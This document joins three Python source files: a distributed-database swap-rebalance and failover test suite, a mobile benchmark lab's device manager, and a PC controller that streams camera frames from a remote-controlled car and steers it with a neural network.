@staticmethod
def sleep(self, timeout=1, message=""):
self.log.info("sleep for {0} secs. {1} ...".format(timeout, message))
time.sleep(timeout)
@staticmethod
def _create_default_bucket(self, replica=1):
name = "default"
master = self.servers[0]
rest = RestConnection(master)
helper = RestHelper(RestConnection(master))
if not helper.bucket_exists(name):
node_ram_ratio = BucketOperationHelper.base_bucket_ratio(self.servers)
info = rest.get_nodes_self()
available_ram = info.memoryQuota * node_ram_ratio
rest.create_bucket(bucket=name, ramQuotaMB=int(available_ram), replicaNumber=replica)
ready = BucketOperationHelper.wait_for_memcached(master, name)
self.assertTrue(ready, msg="wait_for_memcached failed")
self.assertTrue(helper.bucket_exists(name),
msg="unable to create {0} bucket".format(name))
@staticmethod
def _create_multiple_buckets(self, replica=1):
master = self.servers[0]
created = BucketOperationHelper.create_multiple_buckets(master, replica, howmany=self.num_buckets)
self.assertTrue(created, "unable to create multiple buckets")
rest = RestConnection(master)
buckets = rest.get_buckets()
for bucket in buckets:
ready = BucketOperationHelper.wait_for_memcached(master, bucket.name)
self.assertTrue(ready, msg="wait_for_memcached failed")
# Used for items verification active vs. replica
@staticmethod
def items_verification(test, master):
rest = RestConnection(master)
# Verify items count across all node
timeout = 600
for bucket in rest.get_buckets():
verified = RebalanceHelper.wait_till_total_numbers_match(master, bucket.name, timeout_in_seconds=timeout)
test.assertTrue(verified, "Lost items!!.. failing test in {0} secs".format(timeout))
@staticmethod
def start_load_phase(self, master):
loaders = []
rest = RestConnection(master)
for bucket in rest.get_buckets():
loader = dict()
loader["mcsoda"] = LoadWithMcsoda(master, self.keys_count, bucket=bucket.name,
rest_password=master.rest_password, prefix=str(bucket.name), port=8091)
loader["mcsoda"].cfg["exit-after-creates"] = 1
loader["mcsoda"].cfg["json"] = 0
loader["thread"] = Thread(target=loader["mcsoda"].load_data, name='mcloader_' + bucket.name)
loader["thread"].daemon = True
loaders.append(loader)
for loader in loaders:
loader["thread"].start()
return loaders
@staticmethod
def start_access_phase(self, master):
loaders = []
rest = RestConnection(master)
for bucket in rest.get_buckets():
loader = dict()
loader["mcsoda"] = LoadWithMcsoda(master, self.keys_count // 2, bucket=bucket.name,
rest_password=master.rest_password, prefix=str(bucket.name), port=8091)
loader["mcsoda"].cfg["ratio-sets"] = 0.8
loader["mcsoda"].cfg["ratio-hot"] = 0.2
loader["mcsoda"].cfg["ratio-creates"] = 0.5
loader["mcsoda"].cfg["ratio-deletes"] = self.ratio_deletes
loader["mcsoda"].cfg["ratio-expirations"] = self.ratio_expiry
loader["mcsoda"].cfg["json"] = 0
loader["thread"] = Thread(target=loader["mcsoda"].load_data, name='mcloader_' + bucket.name)
loader["thread"].daemon = True
loaders.append(loader)
for loader in loaders:
loader["thread"].start()
return loaders
@staticmethod
def stop_load(loaders, do_stop=True):
if do_stop:
for loader in loaders:
loader["mcsoda"].load_stop()
for loader in loaders:
if do_stop:
loader["thread"].join(300)
else:
loader["thread"].join()
@staticmethod
def create_buckets(self):
if self.num_buckets == 1:
SwapRebalanceBase._create_default_bucket(self, replica=self.replica)
else:
SwapRebalanceBase._create_multiple_buckets(self, replica=self.replica)
@staticmethod
def verification_phase(test, master):
# Stop loaders
SwapRebalanceBase.stop_load(test.loaders)
test.log.info("DONE DATA ACCESS PHASE")
test.log.info("VERIFICATION PHASE")
rest = RestConnection(master)
servers_in_cluster = []
nodes = rest.get_nodes()
for server in test.servers:
for node in nodes:
if node.ip == server.ip and node.port == server.port:
servers_in_cluster.append(server)
time.sleep(60)
SwapRebalanceBase.items_verification(test, master)
@staticmethod
def _common_test_body_swap_rebalance(self, do_stop_start=False):
master = self.servers[0]
rest = RestConnection(master)
num_initial_servers = self.num_initial_servers
creds = self.input.membase_settings
        initial_servers = self.servers[:num_initial_servers]
self.log.info("CREATE BUCKET PHASE")
SwapRebalanceBase.create_buckets(self)
# Cluster all starting set of servers
self.log.info("INITIAL REBALANCE PHASE")
        status, servers_rebalanced = RebalanceHelper.rebalance_in(initial_servers, len(initial_servers) - 1)
        self.assertTrue(status, msg="Rebalance failed")
self.log.info("DATA LOAD PHASE")
self.loaders = SwapRebalanceBase.start_load_phase(self, master)
# Wait till load phase is over
SwapRebalanceBase.stop_load(self.loaders, do_stop=False)
self.log.info("DONE LOAD PHASE")
# Start the swap rebalance
current_nodes = RebalanceHelper.getOtpNodeIds(master)
self.log.info("current nodes : {0}".format(current_nodes))
toBeEjectedNodes = RebalanceHelper.pick_nodes(master, howmany=self.num_swap)
optNodesIds = [node.id for node in toBeEjectedNodes]
if self.swap_orchestrator:
status, content = ClusterOperationHelper.find_orchestrator(master)
self.assertTrue(status, msg="Unable to find orchestrator: {0}:{1}".\
format(status, content))
            if self.num_swap == len(current_nodes):
optNodesIds.append(content)
else:
optNodesIds[0] = content
for node in optNodesIds:
self.log.info("removing node {0} and rebalance afterwards".format(node))
new_swap_servers = self.servers[num_initial_servers:num_initial_servers + self.num_swap]
for server in new_swap_servers:
otpNode = rest.add_node(creds.rest_username, creds.rest_password, server.ip, server.port)
msg = "unable to add node {0} to the cluster"
self.assertTrue(otpNode, msg.format(server.ip))
if self.swap_orchestrator:
rest = RestConnection(new_swap_servers[0])
master = new_swap_servers[0]
if self.do_access:
self.log.info("DATA ACCESS PHASE")
self.loaders = SwapRebalanceBase.start_access_phase(self, master)
self.log.info("SWAP REBALANCE PHASE")
rest.rebalance(otpNodes=[node.id for node in rest.node_statuses()],
ejectedNodes=optNodesIds)
if do_stop_start:
# Rebalance is stopped at 20%, 40% and 60% completion
retry = 0
for expected_progress in (20, 40, 60):
self.log.info("STOP/START SWAP REBALANCE PHASE WITH PROGRESS {0}%".
format(expected_progress))
while True:
progress = rest._rebalance_progress()
if progress < 0:
self.log.error("rebalance progress code : {0}".format(progress))
break
elif progress == 100:
self.log.warning("Rebalance has already reached 100%")
break
elif progress >= expected_progress:
self.log.info("Rebalance will be stopped with {0}%".format(progress))
stopped = rest.stop_rebalance()
self.assertTrue(stopped, msg="unable to stop rebalance")
SwapRebalanceBase.sleep(self, 20)
rest.rebalance(otpNodes=[node.id for node in rest.node_statuses()],
ejectedNodes=optNodesIds)
break
elif retry > 100:
break
else:
retry += 1
SwapRebalanceBase.sleep(self, 1)
self.assertTrue(rest.monitorRebalance(),
msg="rebalance operation failed after adding node {0}".format(optNodesIds))
SwapRebalanceBase.verification_phase(self, master)
@staticmethod
def _common_test_body_failed_swap_rebalance(self):
master = self.servers[0]
rest = RestConnection(master)
num_initial_servers = self.num_initial_servers
creds = self.input.membase_settings
        initial_servers = self.servers[:num_initial_servers]
self.log.info("CREATE BUCKET PHASE")
SwapRebalanceBase.create_buckets(self)
# Cluster all starting set of servers
self.log.info("INITIAL REBALANCE PHASE")
        status, servers_rebalanced = RebalanceHelper.rebalance_in(initial_servers, len(initial_servers) - 1)
        self.assertTrue(status, msg="Rebalance failed")
self.log.info("DATA LOAD PHASE")
self.loaders = SwapRebalanceBase.start_load_phase(self, master)
# Wait till load phase is over
SwapRebalanceBase.stop_load(self.loaders, do_stop=False)
self.log.info("DONE LOAD PHASE")
# Start the swap rebalance
current_nodes = RebalanceHelper.getOtpNodeIds(master)
self.log.info("current nodes : {0}".format(current_nodes))
toBeEjectedNodes = RebalanceHelper.pick_nodes(master, howmany=self.num_swap)
optNodesIds = [node.id for node in toBeEjectedNodes]
if self.swap_orchestrator:
status, content = ClusterOperationHelper.find_orchestrator(master)
self.assertTrue(status, msg="Unable to find orchestrator: {0}:{1}".\
format(status, content))
# When swapping all the nodes
            if self.num_swap == len(current_nodes):
optNodesIds.append(content)
else:
optNodesIds[0] = content
for node in optNodesIds:
self.log.info("removing node {0} and rebalance afterwards".format(node))
new_swap_servers = self.servers[num_initial_servers:num_initial_servers + self.num_swap]
for server in new_swap_servers:
otpNode = rest.add_node(creds.rest_username, creds.rest_password, server.ip, server.port)
msg = "unable to add node {0} to the cluster"
self.assertTrue(otpNode, msg.format(server.ip))
if self.swap_orchestrator:
rest = RestConnection(new_swap_servers[0])
master = new_swap_servers[0]
self.log.info("DATA ACCESS PHASE")
self.loaders = SwapRebalanceBase.start_access_phase(self, master)
self.log.info("SWAP REBALANCE PHASE")
rest.rebalance(otpNodes=[node.id for node in rest.node_statuses()],
ejectedNodes=optNodesIds)
SwapRebalanceBase.sleep(self, 10, "Rebalance should start")
self.log.info("FAIL SWAP REBALANCE PHASE @ {0}".format(self.percentage_progress))
reached = RestHelper(rest).rebalance_reached(self.percentage_progress)
if reached and RestHelper(rest).is_cluster_rebalanced():
# handle situation when rebalance failed at the beginning
self.log.error('seems rebalance failed!')
rest.print_UI_logs()
self.fail("rebalance failed even before killing memcached")
bucket = rest.get_buckets()[0].name
pid = None
if self.swap_orchestrator and not self.cluster_run:
# get PID via remote connection if master is a new node
shell = RemoteMachineShellConnection(master)
pid = shell.get_memcache_pid()
shell.disconnect()
else:
times = 2
if self.cluster_run:
times = 20
for i in range(times):
try:
_mc = MemcachedClientHelper.direct_client(master, bucket)
pid = _mc.stats()["pid"]
break
except (EOFError, KeyError) as e:
self.log.error("{0}.Retry in 2 sec".format(e))
SwapRebalanceBase.sleep(self, 2)
if pid is None:
# sometimes pid is not returned by mc.stats()
shell = RemoteMachineShellConnection(master)
pid = shell.get_memcache_pid()
shell.disconnect()
if pid is None:
self.fail("impossible to get a PID")
command = "os:cmd(\"kill -9 {0} \")".format(pid)
self.log.info(command)
killed = rest.diag_eval(command)
self.log.info("killed {0}:{1}?? {2} ".format(master.ip, master.port, killed))
self.log.info("sleep for 10 sec after kill memcached")
SwapRebalanceBase.sleep(self, 10)
# we can't get stats for new node when rebalance falls
if not self.swap_orchestrator:
ClusterOperationHelper._wait_warmup_completed(self, [master], bucket, wait_time=600)
i = 0
# we expect that rebalance will be failed
try:
rest.monitorRebalance()
except RebalanceFailedException:
# retry rebalance if it failed
self.log.warning("Rebalance failed but it's expected")
SwapRebalanceBase.sleep(self, 30)
self.assertFalse(RestHelper(rest).is_cluster_rebalanced(), msg="cluster need rebalance")
            knownNodes = rest.node_statuses()
self.log.info("nodes are still in cluster: {0}".format([(node.ip, node.port) for node in knownNodes]))
ejectedNodes = list(set(optNodesIds) & {node.id for node in knownNodes})
rest.rebalance(otpNodes=[node.id for node in knownNodes], ejectedNodes=ejectedNodes)
SwapRebalanceBase.sleep(self, 10, "Wait for rebalance to start")
self.assertTrue(rest.monitorRebalance(),
msg="rebalance operation failed after adding node {0}".format(toBeEjectedNodes))
else:
self.log.info("rebalance completed successfully")
SwapRebalanceBase.verification_phase(self, master)
@staticmethod
def _add_back_failed_node(self, do_node_cleanup=False):
master = self.servers[0]
rest = RestConnection(master)
creds = self.input.membase_settings
self.log.info("CREATE BUCKET PHASE")
SwapRebalanceBase.create_buckets(self)
# Cluster all servers
self.log.info("INITIAL REBALANCE PHASE")
status, servers_rebalanced = RebalanceHelper.rebalance_in(self.servers, len(self.servers) - 1)
        self.assertTrue(status, msg="Rebalance failed")
self.log.info("DATA LOAD PHASE")
self.loaders = SwapRebalanceBase.start_load_phase(self, master)
# Wait till load phase is over
SwapRebalanceBase.stop_load(self.loaders, do_stop=False)
self.log.info("DONE LOAD PHASE")
# Start the swap rebalance
current_nodes = RebalanceHelper.getOtpNodeIds(master)
self.log.info("current nodes : {0}".format(current_nodes))
toBeEjectedNodes = RebalanceHelper.pick_nodes(master, howmany=self.failover_factor)
optNodesIds = [node.id for node in toBeEjectedNodes]
# List of servers that will not be failed over
not_failed_over = []
for server in self.servers:
if self.cluster_run:
if server.port not in [node.port for node in toBeEjectedNodes]:
not_failed_over.append(server)
self.log.info("Node {0}:{1} not failed over".format(server.ip, server.port))
else:
if server.ip not in [node.ip for node in toBeEjectedNodes]:
not_failed_over.append(server)
self.log.info("Node {0}:{1} not failed over".format(server.ip, server.port))
if self.fail_orchestrator:
status, content = ClusterOperationHelper.find_orchestrator(master)
self.assertTrue(status, msg="Unable to find orchestrator: {0}:{1}".\
format(status, content))
# When swapping all the nodes
            if self.num_swap == len(current_nodes):
optNodesIds.append(content)
else:
optNodesIds[0] = content
master = not_failed_over[-1]
self.log.info("DATA ACCESS PHASE")
self.loaders = SwapRebalanceBase.start_access_phase(self, master)
# Failover selected nodes
for node in optNodesIds:
self.log.info("failover node {0} and rebalance afterwards".format(node))
rest.fail_over(node)
rest.rebalance(otpNodes=[node.id for node in rest.node_statuses()], \
ejectedNodes=optNodesIds)
self.assertTrue(rest.monitorRebalance(),
msg="rebalance operation failed after adding node {0}".format(optNodesIds))
# Add back the same failed over nodes
# Cleanup the node, somehow
# TODO: cluster_run?
if do_node_cleanup:
pass
# Make rest connection with node part of cluster
rest = RestConnection(master)
# Given the optNode, find ip
add_back_servers = []
nodes = rest.get_nodes()
for server in nodes:
if isinstance(server.ip, str):
add_back_servers.append(server)
final_add_back_servers = []
for server in self.servers:
if self.cluster_run:
if server.port not in [serv.port for serv in add_back_servers]:
final_add_back_servers.append(server)
else:
if server.ip not in [serv.ip for serv in add_back_servers]:
final_add_back_servers.append(server)
for server in final_add_back_servers:
otpNode = rest.add_node(creds.rest_username, creds.rest_password, server.ip, server.port)
msg = "unable to add node {0} to the cluster"
self.assertTrue(otpNode, msg.format(server.ip))
rest.rebalance(otpNodes=[node.id for node in rest.node_statuses()], ejectedNodes=[])
self.assertTrue(rest.monitorRebalance(),
msg="rebalance operation failed after adding node {0}".format(add_back_servers))
SwapRebalanceBase.verification_phase(self, master)
@staticmethod
def _failover_swap_rebalance(self):
master = self.servers[0]
rest = RestConnection(master)
creds = self.input.membase_settings
num_initial_servers = self.num_initial_servers
        initial_servers = self.servers[:num_initial_servers]
self.log.info("CREATE BUCKET PHASE")
SwapRebalanceBase.create_buckets(self)
# Cluster all starting set of servers
self.log.info("INITIAL REBALANCE PHASE")
        status, servers_rebalanced = RebalanceHelper.rebalance_in(initial_servers, len(initial_servers) - 1)
        self.assertTrue(status, msg="Rebalance failed")
self.log.info("DATA LOAD PHASE")
self.loaders = SwapRebalanceBase.start_load_phase(self, master)
# Wait till load phase is over
SwapRebalanceBase.stop_load(self.loaders, do_stop=False)
self.log.info("DONE LOAD PHASE")
# Start the swap rebalance
self.log.info("current nodes : {0}".format(RebalanceHelper.getOtpNodeIds(master)))
toBeEjectedNodes = RebalanceHelper.pick_nodes(master, howmany=self.failover_factor)
optNodesIds = [node.id for node in toBeEjectedNodes]
if self.fail_orchestrator:
status, content = ClusterOperationHelper.find_orchestrator(master)
self.assertTrue(status, msg="Unable to find orchestrator: {0}:{1}".\
format(status, content))
optNodesIds[0] = content
self.log.info("FAILOVER PHASE")
# Failover selected nodes
for node in optNodesIds:
self.log.info("failover node {0} and rebalance afterwards".format(node))
rest.fail_over(node)
self.assertTrue(rest.monitorRebalance(),
msg="failed after failover of {0}".format(node))
new_swap_servers = self.servers[num_initial_servers:num_initial_servers + self.failover_factor]
for server in new_swap_servers:
otpNode = rest.add_node(creds.rest_username, creds.rest_password, server.ip, server.port)
msg = "unable to add node {0} to the cluster"
self.assertTrue(otpNode, msg.format(server.ip))
if self.fail_orchestrator:
rest = RestConnection(new_swap_servers[0])
master = new_swap_servers[0]
self.log.info("DATA ACCESS PHASE")
self.loaders = SwapRebalanceBase.start_access_phase(self, master)
rest.rebalance(otpNodes=[node.id for node in rest.node_statuses()], \
ejectedNodes=optNodesIds)
self.assertTrue(rest.monitorRebalance(),
msg="rebalance operation failed after adding node {0}".format(new_swap_servers))
SwapRebalanceBase.verification_phase(self, master)
class SwapRebalanceBasicTests(unittest.TestCase):
def setUp(self):
SwapRebalanceBase.common_setup(self)
def tearDown(self):
SwapRebalanceBase.common_tearDown(self)
def do_test(self):
SwapRebalanceBase._common_test_body_swap_rebalance(self, do_stop_start=False)
class SwapRebalanceStartStopTests(unittest.TestCase):
def setUp(self):
SwapRebalanceBase.common_setup(self)
def tearDown(self):
SwapRebalanceBase.common_tearDown(self)
def do_test(self):
SwapRebalanceBase._common_test_body_swap_rebalance(self, do_stop_start=True)
class SwapRebalanceFailedTests(unittest.TestCase):
def setUp(self):
SwapRebalanceBase.common_setup(self)
def tearDown(self):
SwapRebalanceBase.common_tearDown(self)
def test_failed_swap_rebalance(self):
self.percentage_progress = self.input.param("percentage_progress", 50)
SwapRebalanceBase._common_test_body_failed_swap_rebalance(self)
# Not cluster_run friendly, yet
def test_add_back_failed_node(self):
SwapRebalanceBase._add_back_failed_node(self, do_node_cleanup=False)
def test_failover_swap_rebalance(self):
SwapRebalanceBase._failover_swap_rebalance(self)
|
device_manager.py
|
#!/usr/bin/env python
##############################################################################
# Copyright 2020-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
##############################################################################
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import datetime
import json
import time
from bridge.db import DBDriver
from get_connected_devices import GetConnectedDevices
from platforms.android.adb import ADB
from platforms.platforms import getDeviceList
from reboot_device import reboot as reboot_device
from threading import Thread, RLock
from typing import Dict
from utils.custom_logger import getLogger
REBOOT_INTERVAL = datetime.timedelta(hours=8)
MINIMUM_DM_INTERVAL = 10
DEFAULT_DM_INTERVAL = 10
def getDevicesString(devices):
device_list = [d["kind"] + "|"
+ d["hash"] + "|" + d["name"] + "|"
+ d["abi"] + "|" + d["os"] + "|"
+ ("1" if d["available"]
else "0" if d["live"] else "2")
for d in devices]
devices_str = ",".join(device_list)
return devices_str
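# Minimal usage sketch (hypothetical device): getDevicesString() serializes device
# metadata into the "kind|hash|name|abi|os|state" records the DB layer expects,
# joined with commas.
def _get_devices_string_example():
    device = {
        "kind": "android",
        "hash": "ABC123",
        "name": "Pixel 3",
        "abi": "arm64-v8a",
        "os": "11",
        "available": True,
        "live": True,
    }
    assert getDevicesString([device]) == "android|ABC123|Pixel 3|arm64-v8a|11|1"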
def valid_dm_interval(arg) -> int:
try:
value = int(arg)
if value < MINIMUM_DM_INTERVAL:
raise ValueError()
except ValueError:
getLogger().warning("Logging interval must be specified as an integer in seconds >= {}. Using default {}s.".format(MINIMUM_DM_INTERVAL,DEFAULT_DM_INTERVAL))
value = DEFAULT_DM_INTERVAL
return value
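# Minimal usage sketch (hypothetical argument values): valid_dm_interval() coerces the
# CLI argument to an int and falls back to DEFAULT_DM_INTERVAL when the value is
# non-numeric or below MINIMUM_DM_INTERVAL.
def _valid_dm_interval_example():
    assert valid_dm_interval("30") == 30
    assert valid_dm_interval("5") == DEFAULT_DM_INTERVAL   # below the minimum
    assert valid_dm_interval("ten") == DEFAULT_DM_INTERVAL  # not an integer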
class DeviceManager(object):
"""
Provides devices metadata to the lab instance. For mobile platforms, checks connectivity of devices and performs updates to lab devices and db.
"""
def __init__(self, args: Dict, db: DBDriver):
self.args = args
self.db: DBDriver = db
self.lab_devices = {}
self.online_devices = None
self._initializeDevices()
self.running = True
self.device_monitor_interval = self.args.device_monitor_interval
        self.device_monitor = Thread(target=self._runDeviceMonitor)
self.device_monitor.start()
if self.args.usb_hub_device_mapping:
from utils.usb_controller import USBController
self.usb_controller = USBController(self.args.usb_hub_device_mapping)
else:
self.usb_controller = None
def getLabDevices(self):
""" Return a reference to the lab's device meta data. """
return self.lab_devices
def _runDeviceMonitor(self):
while self.running:
# if the lab is hosting mobile devices, thread will monitor connectivity of devices.
if self.args.platform.startswith("android") or self.args.platform.startswith("ios"):
self._checkDevices()
self._updateHeartbeats()
time.sleep(self.device_monitor_interval)
def _checkDevices(self):
""" Run any device health checks, e.g. connectivity, battery, etc. """
try:
online_hashes = getDeviceList(self.args, silent=True)
offline_devices = [device for device in self.online_devices if device["hash"] not in online_hashes]
new_devices = [h for h in online_hashes if h not in [p["hash"] for p in self.online_devices]]
if offline_devices:
for offline_device in offline_devices:
lab_device = self.lab_devices[offline_device["kind"]][offline_device["hash"]]
usb_disabled = False
if self.usb_controller and not self.usb_controller.active.get(lab_device["hash"], True):
usb_disabled = True
if "rebooting" not in lab_device and not usb_disabled:
getLogger().error("Device {} has become unavailable.".format(offline_device))
self._disableDevice(offline_device)
# TODO: self._sendErrorReport()
if new_devices:
devices=",".join(new_devices)
devices = self._getDevices(devices)
if devices:
for d in devices:
self._enableDevice(d)
if d["hash"] not in [device["hash"] for device in self.online_devices]:
self.online_devices.append(d)
getLogger().info("New device added: {}".format(d))
except BaseException:
getLogger().exception("Error while checking devices.")
def _updateHeartbeats(self):
""" Update device heartbeats for all devices which are marked "live" in lab devices. """
claimer_id = self.args.claimer_id
hashes = []
for k in self.lab_devices:
for hash in self.lab_devices[k]:
if self.lab_devices[k][hash]["live"]:
hashes.append(hash)
hashes = ",".join(hashes)
self.db.updateHeartbeats(claimer_id, hashes)
def _getDevices(self, devices=None):
""" Get list of device meta data for available devices. """
raw_args = []
raw_args.extend(["--platform", self.args.platform])
if self.args.platform_sig:
raw_args.append("--platform_sig")
raw_args.append(self.args.platform_sig)
if devices:
raw_args.append("--devices")
raw_args.append(devices)
elif self.args.devices:
raw_args.append("--devices")
raw_args.append(self.args.devices)
if self.args.hash_platform_mapping:
# if the user provides filename, we will load it.
raw_args.append("--hash_platform_mapping")
raw_args.append(self.args.hash_platform_mapping)
if self.args.device_name_mapping:
# if the user provides filename, we will load it.
raw_args.append("--device_name_mapping")
raw_args.append(self.args.device_name_mapping)
app = GetConnectedDevices(raw_args=raw_args)
devices_json = app.run()
assert devices_json, "Devices cannot be empty"
devices = json.loads(devices_json.strip())
return devices
def _initializeDevices(self):
""" Create device meta data used by lab instance, and update devices in db. """
self.online_devices = self._getDevices()
for k in self.online_devices:
kind = k["kind"]
hash = k["hash"]
name = k["name"]
abi = k["abi"]
os = k["os"]
entry = {
"kind": kind,
"hash": hash,
"name": name,
"abi": abi,
"os": os,
"available": True,
"live": True,
"start_time": None,
"done_time": None,
"output_dir": None,
"job": None,
"adb": ADB(hash, self.args.android_dir),
"reboot_time": datetime.datetime.now() - datetime.timedelta(hours=8),
"usb_hub": {}
}
if kind not in self.lab_devices:
self.lab_devices[kind] = {}
self.lab_devices[kind][hash] = entry
dvs = [self.lab_devices[k][h] for k in self.lab_devices for h in self.lab_devices[k]]
self.db.updateDevices(self.args.claimer_id,
getDevicesString(dvs), True)
def _disableDevice(self, device):
kind = device["kind"]
hash = device["hash"]
        entry = self.lab_devices[kind][hash]
entry["available"] = False
entry["live"] = False
self.online_devices.remove(device)
self.db.updateDevices(self.args.claimer_id,
getDevicesString([self.lab_devices[kind][hash]]), False)
def _enableDevice(self, device):
kind = device["kind"]
hash = device["hash"]
name = device["name"]
abi = device["abi"]
os = device["os"]
entry = {
"kind": kind,
"hash": hash,
"name": name,
"abi": abi,
"os": os,
"available": True,
"live": True,
"start_time": None,
"done_time": None,
"output_dir": None,
"job": None,
"adb": ADB(hash, self.args.android_dir),
"reboot_time": datetime.datetime.now() - datetime.timedelta(hours=8),
"usb_hub": {}
}
if kind not in self.lab_devices:
            self.lab_devices[kind] = {}
self.lab_devices[kind][hash] = entry
self.db.updateDevices(self.args.claimer_id,
getDevicesString([self.lab_devices[kind][hash]]), False)
def _sendErrorReport(self, emsg):
# TODO: send alert to support team to troubleshoot
raise NotImplementedError
def shutdown(self):
self.db.updateDevices(self.args.claimer_id, "", True)
self.running = False
class CoolDownDevice(Thread):
""" Used by AsyncRun to cool device down after benchmark. Will reboot the device if required and add rebooting status to device entry. """
def __init__(self, device, args, db, force_reboot, LOCK: RLock):
Thread.__init__(self)
self.device = device
self.args = args
self.db = db
self.force_reboot = force_reboot
self.LOCK = LOCK
def run(self):
reboot = self.args.reboot and \
(self.force_reboot
or self.device["reboot_time"] + REBOOT_INTERVAL
< datetime.datetime.now())
success = True
# reboot mobile devices if required
if reboot:
raw_args = []
raw_args.extend(["--platform", self.args.platform])
raw_args.extend(["--device", self.device["hash"]])
raw_args.extend(["--android_dir", self.args.android_dir])
self.device["rebooting"] = True
if reboot_device(raw_args=raw_args):
getLogger().info("Device {} was rebooted.".format(self.device))
self.device["reboot_time"] = datetime.datetime.now()
else:
self.device.pop("rebooting")
getLogger().error("Device {} could not be rebooted.".format(self.device))
success = False
# sleep for device cooldown
if self.args.platform.startswith("ios") or self.args.platform.startswith("android"):
getLogger().info("Sleep 180 seconds")
time.sleep(180)
else:
getLogger().info("Sleep 20 seconds")
time.sleep(20)
with self.LOCK:
getLogger().info("CoolDownDevice lock acquired")
# device should be available again, remove rebooting flag.
if "rebooting" in self.device:
del(self.device["rebooting"])
if success:
self.device["available"] = True
device_str = getDevicesString([self.device])
self.db.updateDevices(self.args.claimer_id, device_str, False)
getLogger().info("Device {}({}) available".format(
self.device["kind"], self.device["hash"]))
else:
self.device["live"] = False
getLogger().info("CoolDownDevice lock released")
|
pc_main.py
|
import numpy as np
import cv2
import pygame
import threading
import socketserver
import socket
from queue import Queue
import time
import pandas as pd
from keras.models import model_from_yaml
import os
RUN = True
COLLECT = False
q = Queue(100)
class Control(object):
    """Keeps track of steering during training and parses
    the steering state produced by the neural network."""
def __init__(self):
self.mag = 300
self.rate = self.mag / 2
self.third = self.mag / 3
self.range = 2 * (self.mag - self.third)
self.left = self.mag
self.right = self.mag
self.colors = []
def left_pressed(self):
if self.right < self.mag:
self.right += 1
elif self.left > self.third:
self.left -= 1
def right_pressed(self):
if self.left < self.mag:
self.left += 1
elif self.right > self.third:
self.right -= 1
def get_target(self):
if self.left < self.mag:
return self.left
else:
diff = self.mag - self.right
return self.mag + diff
    def set_rates(self, y):
        # clamp the network output into [0, 1] before scaling to wheel rates,
        # so out-of-range predictions map to the extreme steering positions
        if y < 0.0:
            y = 0.0
        elif y > 1.0:
            y = 1.0
        y = (y * self.range) + self.third
        if y < self.mag:
            self.left = int(y)
            self.right = self.mag
        elif y == self.mag:
            self.left = self.mag
            self.right = self.mag
        else:
            diff = int(y) - self.mag
            self.left = self.mag
            self.right = self.mag - diff
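# Minimal usage sketch (hypothetical outputs): Control.set_rates() maps the network
# output y in [0, 1] onto left/right wheel rates; y = 0.5 keeps both wheels at the
# full rate (300), smaller y slows the left wheel, larger y slows the right wheel.
def _control_example():
    control = Control()
    control.set_rates(0.5)
    assert (control.left, control.right) == (300, 300)
    control.set_rates(0.0)
    assert (control.left, control.right) == (100, 300)
    control.set_rates(1.0)
    assert (control.left, control.right) == (300, 100)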
class VideoStreamHandler(socketserver.StreamRequestHandler):
'parses images as they arrive and pushes them into a queue'
def handle(self):
global RUN, q
fps = []
print("Streaming...")
start_time = time.time()
stream_bytes = bytearray()
while RUN:
stream_bytes += self.rfile.read(1024)
first = stream_bytes.find(b'\xff\xd8')
last = stream_bytes.find(b'\xff\xd9')
if first != -1 and last != -1:
delta_time = time.time() - start_time
fps.append(delta_time)
if len(fps) > 30:
fps.pop(0)
rate = 1/(np.sum(fps)/len(fps))
#print(int(rate))
start_time = time.time()
jpg = stream_bytes[first:last + 2]
stream_bytes = stream_bytes[last + 2:]
arr = np.asarray(jpg, dtype=np.uint8)
image = cv2.imdecode(arr, 1)
q.put(image)
class ImageHandler(object):
'processes images as soon as they arrive'
def __init__(self):
self.control = Control()
self.cnt = 0
self.image = np.zeros((200,66))
self.target = []
if not COLLECT:
self.load_models()
def load_models(self):
os.chdir('results')
yaml_file = open('nvidia.yaml', 'r')
model_yaml = yaml_file.read()
yaml_file.close()
model = model_from_yaml(model_yaml)
model.load_weights('nvidia.h5')
model.compile(loss='mse', optimizer='adam')
self.model = model
self.model._make_predict_function()
os.chdir('..')
def create_csv(self):
df = pd.DataFrame(self.target, columns=['target'])
df.to_csv('images/target.csv', index=False)
def process_image(self):
'receives images. either stores images or evaluates using nn model'
if q.empty() is False:
image = q.get()
#image is bgr format
image = np.rot90(image, k=2)
self.image = image
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
blue_lower = np.array([ 80, 0, 0])
blue_upper = np.array([120,255,255])
mask = cv2.inRange(hsv, blue_lower, blue_upper)
blue_image = cv2.bitwise_and(image, image, mask=mask)
if COLLECT:
cv2.imwrite('images/color/image_'+str(self.cnt)+'.jpeg', image)
cv2.imwrite('images/gray/image_'+str(self.cnt)+'.jpeg', gray)
cv2.imwrite('images/blue/image_'+str(self.cnt)+'.jpeg', blue_image)
self.target.append(self.control.get_target())
self.cnt += 1
else:
rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
X = rgb.astype(np.float32).reshape(1, 66, 200, 3)
y = self.model.predict(X)[0][0]
self.control.set_rates(y)
return True
else:
return False
def query_keyboard(self):
'checks which arrow keys are pressed and updates steering'
keys = pygame.key.get_pressed()
if keys[pygame.K_LEFT]:
self.control.left_pressed()
if keys[pygame.K_RIGHT]:
self.control.right_pressed()
left_rate = str(self.control.left)
right_rate = str(self.control.right)
msg = 'L'+left_rate+'R'+right_rate+'E'
self.client_socket.sendall(str.encode(msg))
def update_loop(self, host, port):
        """Checks for new images and pushes them to the pygame window,
        queries the keyboard and sends steering messages to the rpi."""
self.client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.client_socket.connect((host, port))
pygame.init()
screen = pygame.display.set_mode((200,66))
key_time = time.time()
img_time = time.time()
global RUN, q
try:
while RUN:
current = time.time()
                # check for new images and update the display (~100 Hz)
if current - img_time > 1/100:
new_image = self.process_image()
if new_image:
screen.fill([0,0,0])
frame = self.image
frame = cv2.cvtColor(self.image, cv2.COLOR_BGR2RGB)
frame = cv2.flip(frame, 0)
frame = np.rot90(frame, k=3)
frame = pygame.surfarray.make_surface(frame)
screen.blit(frame, (0,0))
pygame.display.update()
img_time = current
                # update drive state (~150 Hz)
if current - key_time > 1/self.control.rate:
self.query_keyboard()
key_time = current
for event in pygame.event.get():
if event.type == pygame.QUIT:
RUN = False
finally:
if COLLECT:
self.create_csv()
self.client_socket.close()
